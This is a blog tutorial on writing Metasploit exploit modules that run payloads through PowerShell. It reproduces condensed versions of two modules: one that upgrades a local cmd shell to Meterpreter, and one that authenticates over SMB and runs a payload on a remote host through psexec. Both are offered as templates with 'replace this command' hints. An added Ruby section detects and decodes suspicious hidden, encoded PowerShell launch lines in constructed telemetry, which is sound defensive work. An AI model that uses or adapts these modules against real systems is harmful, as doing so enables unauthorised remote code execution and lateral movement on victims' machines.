Use Powershell in Metasploit Exploit

  1. 0x01 exploit/windows/local/powershell_cmd_upgrade
  2. 0x02 exploit/windows/smb/psexec_psh
  3. 0x03 References

author: Dlive

This post records how to write your own Metasploit modules that use PowerShell to run the payload.

As with writing SQLmap tampers, the fastest way to write your own module is to look at how Metasploit's built-in modules are written.

Two built-in modules serve as the reference here: one that executes a PowerShell command on the local host (powershell_cmd_upgrade) and one that executes a PowerShell command on a remote host (psexec_psh).

0x01 exploit/windows/local/powershell_cmd_upgrade

This module uses PowerShell to upgrade a cmd shell session to a Meterpreter session.

The module's code is shown below. With the error handling and the description metadata removed, the code for the core functionality is very short:

```ruby
require 'msf/core/exploit/powershell'

class MetasploitModule < Msf::Exploit::Local
  Rank = ExcellentRanking

  include Exploit::Powershell
  include Post::File

  def initialize(info = {})
    # Module metadata (name, description, author, targets ...) removed from this listing;
    # the base class still has to be initialized
    super(info)
  end

  def exploit
    # The original module first checks that powershell.exe exists on the target:
    # psh_path = "\\WindowsPowerShell\\v1.0\\powershell.exe"
    # if file? "%WINDIR%\\System32#{psh_path}"
    print_status("Executing powershell command line...")

    # Replace this command with your own PowerShell command
    command = cmd_psh_payload(payload.encoded, payload_instance.arch.first)
    cmd_exec(command)
    # else
    #   fail_with(Failure::NotVulnerable, "No powershell available.")
    # end
  end
end
```

0x02 exploit/windows/smb/psexec_psh

This module executes a PowerShell command on a remote host via psexec. Again, the error handling and description metadata have been removed:

```ruby
require 'msf/core/exploit/powershell'

class MetasploitModule < Msf::Exploit::Remote
  Rank = ManualRanking

  # Exploit mixins should be called first
  include Msf::Exploit::Remote::SMB::Client::Psexec
  include Msf::Exploit::Powershell

  def initialize(info = {})
    # Module metadata removed from this listing; the base class still has to be initialized
    super(info)
  end

  def exploit
    # Replace this command with your own PowerShell command
    command = cmd_psh_payload(payload.encoded, payload_instance.arch.first)

    # Try and authenticate with given credentials
    if connect
      begin
        smb_login
        # (the error handling for a failed login was removed from this listing)
      end

      # Execute the powershell command
      print_status("Executing the payload...")
      begin
        return psexec(command)
      ensure
        disconnect
      end
    end
  end
end
```
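Both modules above hand the string returned by cmd_psh_payload to the target, where it runs as a powershell.exe command line; that command line is what ends up in the target's process-creation telemetry. The following Ruby is an added example for both sections, written here for this page and not taken from the Metasploit project or from the original post. It shows how a defender would triage such records: it scores launcher switches PowerShell accepts in abbreviated form (-w hidden, -nop, -noni, -ep bypass, -e/-enc), decodes an -EncodedCommand blob (Base64 of the UTF-16LE script), and treats a shell spawned by services.exe (the psexec case) as an extra indicator. The record format, the sample records, the indicator weights and the alert threshold are all constructed assumptions for the demonstration; only the -EncodedCommand encoding rule is PowerShell's own.

```ruby
require 'base64'

# Weighted indicators of a hidden, non-interactive PowerShell launch. Patterns are
# matched case-insensitively against the whole command line and accept PowerShell's
# abbreviated parameter names. Weights and threshold are assumptions for this example.
INDICATORS = {
  'hidden_window'   => [/(?:^|\s)[-\/](?:w|win|windowstyle)\s+hidden\b/i, 1],
  'no_profile'      => [/(?:^|\s)[-\/](?:nop|noprofile)\b/i, 1],
  'non_interactive' => [/(?:^|\s)[-\/](?:noni|noninteractive)\b/i, 1],
  'exec_bypass'     => [/(?:^|\s)[-\/](?:ep|exec|executionpolicy)\s+bypass\b/i, 1],
  'encoded_command' => [/(?:^|\s)[-\/](?:e|ec|enc|encodedcommand)\s+"?([A-Za-z0-9+\/=]+)/i, 2]
}.freeze

SUSPICIOUS_PARENTS = %w[services.exe].freeze # shells started by a service (psexec style)
ALERT_THRESHOLD = 3

# What -EncodedCommand expects: Base64 of the script's UTF-16LE bytes.
def encode_for_powershell(script)
  Base64.strict_encode64(script.encode('UTF-16LE'))
end

# Reverse of the above. Returns nil when the blob is not valid Base64 or cannot be
# UTF-16LE (odd byte count, broken surrogate pairs), so a malformed blob is reported
# rather than crashing the triage loop.
def decode_encoded_command(blob)
  raw = Base64.strict_decode64(blob)
  return nil if raw.bytesize.odd?
  raw.force_encoding('UTF-16LE').encode('UTF-8')
rescue ArgumentError, EncodingError
  nil
end

# Analyze one constructed "<pid>|<parent image>|<command line>" record.
def analyze(record)
  pid, parent, cmdline = record.split('|', 3)
  hits = {}
  decoded = nil
  INDICATORS.each do |name, (pattern, weight)|
    m = pattern.match(cmdline.to_s)
    next unless m
    hits[name] = weight
    decoded = decode_encoded_command(m[1]) if m[1] # only the encoded_command pattern captures
  end
  score = hits.values.sum
  score += 2 if SUSPICIOUS_PARENTS.include?(parent.to_s.downcase)
  { pid: pid.to_i, parent: parent, indicators: hits.keys, decoded: decoded,
    score: score, suspicious: score >= ALERT_THRESHOLD }
end

# Constructed sample records (not real telemetry). Record 2 carries a benign encoded
# script built with encode_for_powershell; record 3 carries a blob that is valid
# Base64 but decodes to an odd number of bytes, so it cannot be UTF-16LE.
SAMPLE_RECORDS = [
  "4711|explorer.exe|powershell.exe -File C:\\scripts\\inventory.ps1",
  "4720|cmd.exe|powershell.exe -nop -w hidden -noni -e #{encode_for_powershell("Write-Output 'constructed stage'")}",
  "4732|services.exe|%COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -noni -e QUJD",
  "4740|explorer.exe|powershell.exe -ExecutionPolicy Bypass -File C:\\build\\deploy.ps1"
].freeze

def triage(records = SAMPLE_RECORDS)
  records.map { |r| analyze(r) }
end

if __FILE__ == $PROGRAM_NAME
  triage.each do |r|
    flag = r[:suspicious] ? 'ALERT' : 'ok   '
    puts "#{flag} pid=#{r[:pid]} parent=#{r[:parent]} score=#{r[:score]} " \
         "indicators=#{r[:indicators].join(',')} decoded=#{r[:decoded].inspect}"
  end
end
```

The decoded script is returned alongside the score rather than acted on, so the same record can be enriched for an analyst or fed into a further rule; the odd-byte-count check matters because Base64 that is syntactically valid can still be garbage as UTF-16LE, and silently mis-decoding it would hide exactly the records worth looking at.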

0x03 References

  1. Rapid7 - How to use Powershell in an exploit
     https://github.com/rapid7/metasploit-framework/wiki/How-to-use-Powershell-in-an-exploit